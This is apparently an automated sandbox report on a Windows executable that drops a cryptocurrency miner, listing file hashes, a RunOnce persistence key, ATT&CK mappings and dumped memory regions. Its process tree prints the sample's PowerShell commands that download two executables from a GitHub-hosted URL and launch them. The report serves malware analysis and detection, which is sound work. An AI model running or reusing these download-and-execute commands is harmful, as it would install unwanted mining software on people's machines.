5b438029e5a3e3843b22f8f49fa1ccac728eeced3f923426be8b22c35b27b6f6

Analysis

max time kernel
120s
max time network
138s
platform
windows7_x64
resource
win7v20201028
submitted
08-01-2021 18:39

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

3cc33ce58536242bc9b2029cd9475a287351a379ccbd12da6b8b7bf2cc68be89.exe
Size

8.3MB
MD5

9ed9ad87a1564fbb5e1b652b3e7148c8
SHA1

0c001b7e9615cbc22eac2a324d8deb7eaf069ff7
SHA256

3cc33ce58536242bc9b2029cd9475a287351a379ccbd12da6b8b7bf2cc68be89
SHA512

e49e403a73ff1d10111d23cc70ae95ffae63abbc4a52cfc52c447ee9f15e76ab44f07d0f41e3b3e63a73a07e7748b8ac7ed8c997f1051a10ca5fad1dace4183a

Score

10^/10

persistence

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://raw.githubusercontent.com/jkh36/d/main/bild.exe

exe.dropper

https://raw.githubusercontent.com/jkh36/d/main/PhoenixMiner.exe

Signatures

Executes dropped EXE 1 IoCs

Processes:

PhoenixMiner.exe

pid process

1392 PhoenixMiner.exe

pid	process
1392	PhoenixMiner.exe

Loads dropped DLL 4 IoCs

Processes:

3cc33ce58536242bc9b2029cd9475a287351a379ccbd12da6b8b7bf2cc68be89.exe

pid	process
728	3cc33ce58536242bc9b2029cd9475a287351a379ccbd12da6b8b7bf2cc68be89.exe
728	3cc33ce58536242bc9b2029cd9475a287351a379ccbd12da6b8b7bf2cc68be89.exe
728	3cc33ce58536242bc9b2029cd9475a287351a379ccbd12da6b8b7bf2cc68be89.exe
728	3cc33ce58536242bc9b2029cd9475a287351a379ccbd12da6b8b7bf2cc68be89.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

PhoenixMiner.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce	PhoenixMiner.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	PhoenixMiner.exe

JavaScript code in executable 1 IoCs

Processes:

yara_rule

js
Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

powershell.exepowershell.exe

pid process

1980 powershell.exe
1980 powershell.exe
924 powershell.exe
924 powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 1980 powershell.exe
Token: SeDebugPrivilege 924 powershell.exe

yara_rule
js

pid	process
1980	powershell.exe
1980	powershell.exe
924	powershell.exe
924	powershell.exe

description	pid	process
Token: SeDebugPrivilege	1980	powershell.exe
Token: SeDebugPrivilege	924	powershell.exe

Suspicious use of WriteProcessMemory 12 IoCs

Processes:

3cc33ce58536242bc9b2029cd9475a287351a379ccbd12da6b8b7bf2cc68be89.exePhoenixMiner.exe

description	pid	process	target process
PID 728 wrote to memory of 1392	728	3cc33ce58536242bc9b2029cd9475a287351a379ccbd12da6b8b7bf2cc68be89.exe	PhoenixMiner.exe
PID 728 wrote to memory of 1392	728	3cc33ce58536242bc9b2029cd9475a287351a379ccbd12da6b8b7bf2cc68be89.exe	PhoenixMiner.exe
PID 728 wrote to memory of 1392	728	3cc33ce58536242bc9b2029cd9475a287351a379ccbd12da6b8b7bf2cc68be89.exe	PhoenixMiner.exe
PID 728 wrote to memory of 1392	728	3cc33ce58536242bc9b2029cd9475a287351a379ccbd12da6b8b7bf2cc68be89.exe	PhoenixMiner.exe
PID 1392 wrote to memory of 1980	1392	PhoenixMiner.exe	powershell.exe
PID 1392 wrote to memory of 1980	1392	PhoenixMiner.exe	powershell.exe
PID 1392 wrote to memory of 1980	1392	PhoenixMiner.exe	powershell.exe
PID 1392 wrote to memory of 1980	1392	PhoenixMiner.exe	powershell.exe
PID 1392 wrote to memory of 924	1392	PhoenixMiner.exe	powershell.exe
PID 1392 wrote to memory of 924	1392	PhoenixMiner.exe	powershell.exe
PID 1392 wrote to memory of 924	1392	PhoenixMiner.exe	powershell.exe
PID 1392 wrote to memory of 924	1392	PhoenixMiner.exe	powershell.exe

C:\Users\Admin\AppData\Local\Temp\3cc33ce58536242bc9b2029cd9475a287351a379ccbd12da6b8b7bf2cc68be89.exe
"C:\Users\Admin\AppData\Local\Temp\3cc33ce58536242bc9b2029cd9475a287351a379ccbd12da6b8b7bf2cc68be89.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:728

C:\Users\Admin\AppData\Local\Temp\RarSFX0\PhoenixMiner.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\PhoenixMiner.exe"
2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:1392

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command Import-Module BitsTransfer; Start-BitsTransfer -Source https://raw.githubusercontent.com/jkh36/d/main/bild.exe,https://raw.githubusercontent.com/jkh36/d/main/PhoenixMiner.exe -Destination lWr.exe,ck.exe;
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1980

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command Start-Process lWr.exe; Start-Process ck.exe;
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:924

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_1b0b2f5a-4fa9-4284-9780-9a1da7b14a47
MD5
02ff38ac870de39782aeee04d7b48231

SHA1
0390d39fa216c9b0ecdb38238304e518fb2b5095

SHA256
fbd66a9baf753db31b8de23f2d51b67f8676687503653103080c45b16f1dc876

SHA512
24a1ff76ee42ff7a5ea42843928c4df07b06178f7781cd840e1e086e88735d81506eb67259ff1e6ce5aaa7c5baea03886da265eb7e025ff4dc4c4b5f8cd3e341

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_85c7c16f-de6b-4cda-bf8a-ede9c5910d3d
MD5
df44874327d79bd75e4264cb8dc01811

SHA1
1396b06debed65ea93c24998d244edebd3c0209d

SHA256
55de642c5c9e436ec01c57004dae797022442c3245daf7162d19a5585f221181

SHA512
95dc9298b8db059bbe746f67e6a7f8515781c7053cc60c01532e47623a996be7e1bd23d1bd8f5f2045adff27454f44930d503c15b695690088841cedbd2a06c3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a02197da-f9c8-43e6-9ff1-846e01d2d404
MD5
75a8da7754349b38d64c87c938545b1b

SHA1
5c28c257d51f1c1587e29164cc03ea880c21b417

SHA256
bf08151c174b5d00c9dbc7907b2c6a01b4be76bfa3afce1e8bd98a04ad833c96

SHA512
798797bc74c56c874e9a5fdcb0157c04e37a1b3cce285ef064b01bceef8cec45f11a5198918c6c647220b62883606b5e12e3cca3ea369f3a66e69dea6e15f643

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_b771b377-145f-49e9-bf64-45e69646f7b9
MD5
5e3c7184a75d42dda1a83606a45001d8

SHA1
94ca15637721d88f30eb4b6220b805c5be0360ed

SHA256
8278033a65d1ff48be4d86e11f87930d187692f59f8bf2f0a9d170de285afb59

SHA512
fae99b6e9b106e0f1c30aa4082b25ae1ad643455c1295c2c16ad534e3e611b9b08492353ffe1af1cfdddc9b2b7c330747a64012c45e62b8f4a4982dcc214e05b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_c356f451-13b2-41fc-8d4c-54a293efa6e1
MD5
c0e27af42e8ee2a65dd94077deab5d57

SHA1
d8484132d3cf6820c8bc01c9218c5d9987979430

SHA256
5da455a88cf42bab21dfb24a1e62c3eab395e76559b0639552b8dc873a671cc0

SHA512
478dbe92901e849a7af397325ab76c7261af0a1739d2762209517a356397038e33f7beb690233924672699741ce6a0e0a41fd40a17ee1c5dccae84a144b8dba2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ce569c42-07bf-442e-b377-8e9695c9383c
MD5
be4d72095faf84233ac17b94744f7084

SHA1
cc78ce5b9c57573bd214a8f423ee622b00ebb1ec

SHA256
b0d72c5c22e57913476ac8fc686a4593f137c6667d5094522c0a0685dabd7adc

SHA512
43856e9b1032b8690ceea810c931bed3655e9190414bb220fb6afc136f31b8335e07604dffb28405d4006f266a54cff424c527d29924b1b732c9647a3252b097

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
MD5
1dcbc8c9fc6441efa8c68953639b15c8

SHA1
f085cecdf54b1d3a2baecea847582b68616b7d84

SHA256
54326022edc5cbb1368fc743fe8d57ab3d2fa9a941c1ee10b305f6d389743e1c

SHA512
6f30dd747e075ec919d6e13a9548bee60e9a637c7b4ad2228e3caafc99ee17e31f1b36870e546d9fdf95f1b2d91874a7341baee78190354a9f82a77f6f178096

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\PhoenixMiner.exe
MD5
c74ab76362f2321b7143e8ba2517c16b

SHA1
6b4c65e2b1ba59d155c5d453285fae4d3e52b2a6

SHA256
938cb901511ceac91acd8b1eaadabd01688852ed1121250b1c5e587f9ee0512f

SHA512
2a506ba53d4dc837bfabee920617fddc2152fb0a474f6a197086c6ce1aadf7b1f1bc64e8d27b9759cdd567675273c99f6af29c61e9a6c5184171336a1a869a17

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
MD5
e6cf184c0b68069dc1c886e040121634

SHA1
df104b4ca26ac753b77a1a39f248314f3241f413

SHA256
9306aafa858f8fe7c4fbee2751bd594fee9cb64c4b9be45cc5d3a16e4f504787

SHA512
82a3eb4056c907c23b5bf079d256e813e0b79dda9b84df4e0c7182ab0675820d92c6adcc63eefcae12a76e1ec9b1b8f51177a6c6c0f1b118b4b539a288439132

Download Submit
\Users\Admin\AppData\Local\Temp\RarSFX0\PhoenixMiner.exe
MD5
c74ab76362f2321b7143e8ba2517c16b

SHA1
6b4c65e2b1ba59d155c5d453285fae4d3e52b2a6

SHA256
938cb901511ceac91acd8b1eaadabd01688852ed1121250b1c5e587f9ee0512f

SHA512
2a506ba53d4dc837bfabee920617fddc2152fb0a474f6a197086c6ce1aadf7b1f1bc64e8d27b9759cdd567675273c99f6af29c61e9a6c5184171336a1a869a17

Download Submit
\Users\Admin\AppData\Local\Temp\RarSFX0\PhoenixMiner.exe
MD5
c74ab76362f2321b7143e8ba2517c16b

SHA1
6b4c65e2b1ba59d155c5d453285fae4d3e52b2a6

SHA256
938cb901511ceac91acd8b1eaadabd01688852ed1121250b1c5e587f9ee0512f

SHA512
2a506ba53d4dc837bfabee920617fddc2152fb0a474f6a197086c6ce1aadf7b1f1bc64e8d27b9759cdd567675273c99f6af29c61e9a6c5184171336a1a869a17

Download Submit
\Users\Admin\AppData\Local\Temp\RarSFX0\PhoenixMiner.exe
MD5
c74ab76362f2321b7143e8ba2517c16b

SHA1
6b4c65e2b1ba59d155c5d453285fae4d3e52b2a6

SHA256
938cb901511ceac91acd8b1eaadabd01688852ed1121250b1c5e587f9ee0512f

SHA512
2a506ba53d4dc837bfabee920617fddc2152fb0a474f6a197086c6ce1aadf7b1f1bc64e8d27b9759cdd567675273c99f6af29c61e9a6c5184171336a1a869a17

Download Submit
\Users\Admin\AppData\Local\Temp\RarSFX0\PhoenixMiner.exe
MD5
c74ab76362f2321b7143e8ba2517c16b

SHA1
6b4c65e2b1ba59d155c5d453285fae4d3e52b2a6

SHA256
938cb901511ceac91acd8b1eaadabd01688852ed1121250b1c5e587f9ee0512f

SHA512
2a506ba53d4dc837bfabee920617fddc2152fb0a474f6a197086c6ce1aadf7b1f1bc64e8d27b9759cdd567675273c99f6af29c61e9a6c5184171336a1a869a17

Download Submit
memory/924-25-0x0000000000000000-mapping.dmp

Download
memory/924-39-0x0000000006190000-0x0000000006191000-memory.dmp

Filesize
4KB

Download
memory/924-40-0x0000000005700000-0x0000000005701000-memory.dmp

Filesize
4KB

Download
memory/924-43-0x0000000006220000-0x0000000006221000-memory.dmp

Filesize
4KB

Download
memory/924-55-0x00000000062D0000-0x00000000062D1000-memory.dmp

Filesize
4KB

Download
memory/924-56-0x00000000062E0000-0x00000000062E1000-memory.dmp

Filesize
4KB

Download
memory/924-27-0x0000000074440000-0x0000000074B2E000-memory.dmp

Filesize
6.9MB

Download
memory/924-28-0x0000000000C60000-0x0000000000C61000-memory.dmp

Filesize
4KB

Download
memory/924-29-0x0000000004910000-0x0000000004911000-memory.dmp

Filesize
4KB

Download
memory/924-30-0x0000000002690000-0x0000000002691000-memory.dmp

Filesize
4KB

Download
memory/924-31-0x0000000005300000-0x0000000005301000-memory.dmp

Filesize
4KB

Download
memory/1392-6-0x0000000000000000-mapping.dmp

Download
memory/1980-9-0x0000000074480000-0x0000000074B6E000-memory.dmp

Filesize
6.9MB

Download
memory/1980-8-0x0000000000000000-mapping.dmp

Download
memory/1980-11-0x0000000004980000-0x0000000004981000-memory.dmp

Filesize
4KB

Download
memory/1980-10-0x0000000000660000-0x0000000000661000-memory.dmp

Filesize
4KB

Download
memory/1980-24-0x00000000055D0000-0x00000000055D1000-memory.dmp

Filesize
4KB

Download
memory/1980-23-0x0000000006240000-0x0000000006241000-memory.dmp

Filesize
4KB

Download
memory/1980-22-0x00000000061A0000-0x00000000061A1000-memory.dmp

Filesize
4KB

Download
memory/1980-21-0x0000000006110000-0x0000000006111000-memory.dmp

Filesize
4KB

Download
memory/1980-16-0x0000000005720000-0x0000000005721000-memory.dmp

Filesize
4KB

Download
memory/1980-13-0x00000000026D0000-0x00000000026D1000-memory.dmp

Filesize
4KB

Download
memory/1980-12-0x00000000022C0000-0x00000000022C1000-memory.dmp

Filesize
4KB

Download